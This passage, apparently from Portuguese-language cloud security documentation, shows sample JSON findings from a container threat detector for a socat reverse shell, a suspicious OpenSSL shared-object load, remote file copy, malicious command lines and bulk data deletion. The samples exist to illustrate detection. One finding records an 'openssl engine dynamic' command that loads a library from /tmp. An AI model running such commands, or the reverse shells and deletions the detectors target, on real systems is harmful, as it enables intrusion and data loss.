"PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1204/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/f3bf59164816762430e8cdf5a5d64b4284a86af86245a52067c533c8cd98f215/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Execução: Socat Reverse Shell Detected

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Socat Reverse Shell Detected",     "chokepoint": {},     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2025-07-22T00:07:48Z"       }     ],     "createTime": "2025-07-22T00:07:54.853Z",     "database": {},     "dataProtectionKeyGovernance": {},     "eventTime": "2025-07-22T00:07:54.627Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/770715367326",           "timestamp": "2025-07-22T00:07:48.052030557Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "COMMAND_AND_SCRIPTING_INTERPRETER"       ],       "additionalTactics": [         "COMMAND_AND_CONTROL"       ],       "additionalTechniques": [         "MULTI_STAGE_CHANNELS"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/usr/bin/bash\"",           "size": "1446024",           "sha256": "bc5945feb8bd26203ebfafea5ce1878bb2e32cb8fb50ab7ae395cfb1e1aaaef1",           "hashedSize": "1446024",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"/bin/bash\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"_\"",             "val": "\"/bin/sh\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-cups-2025-07-22-00-07-44-utc\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"DEBIAN_FRONTEND\"",             "val": "\"noninteractive\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"SHLVL\"",             "val": "\"2\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           }         ],         "pid": "9",         "parentPid": "8",         "userId": "0"       },       {         "binary": {           "path": "\"/usr/bin/socat1\"",           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "argumentsTruncated": false,         "pid": "0",         "parentPid": "0",         "userId": "0"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_socat_reverse_shell_detected"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0002/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/bc5945feb8bd26203ebfafea5ce1878bb2e32cb8fb50ab7ae395cfb1e1aaaef1/detection"         }       ],       "relatedFindingUri": {}     }   } }     

Execução: objeto partilhado OpenSSL suspeito carregado

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Suspicious OpenSSL Shared Object Loaded",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "SHARED_MODULES"       ],       "additionalTactics": [         "PERSISTENCE"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/usr/bin/openssl\"",           "size": "736792",           "sha256": "d3738c5257ede884644c633582fae65705399e0dd7e2dee70c4ecbba7af73469",           "hashedSize": "736792",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"openssl\"",           "\"engine\"",           "\"dynamic\"",           "\"-pre\"",           "\"SO_PATH:/tmp/libfoo.so\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"HOSTNAME\"",             "val": "\"CONTAINER_NAME\""           },         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_suspicious_openssl_shared_object_loaded"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0002/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/d3738c5257ede884644c633582fae65705399e0dd7e2dee70c4ecbba7af73469/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Exfiltração: inicie ferramentas de cópia de ficheiros remotos no contentor

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Exfiltration: Launch Remote File Copy Tools in Container",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "ESCAPE_TO_HOST"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-launch-remote-file-copy-tools-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "LOW",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_launch_remote_file_copy_tools_in_container"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1020/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/f3bf59164816762430e8cdf5a5d64b4284a86af86245a52067c533c8cd98f215/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Impacto: detetar linhas de comandos maliciosas (pré-visualização)

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Impact: Detect Malicious Cmdlines",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "IMPACT",       "primaryTechniques": [         "DATA_DESTRUCTION"       ],       "additionalTactics": [         "IMPACT"       ],       "additionalTechniques": [         "INHIBIT_SYSTEM_RECOVERY"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-detect-malicious-cmdlines-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_detect_malicious_cmdlines"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1485/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Impacto: remover dados em massa do disco

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Impact: Remove Bulk Data From Disk",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "ESCAPE_TO_HOST"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-remove-bulk-data-from-disk-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "LOW",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": 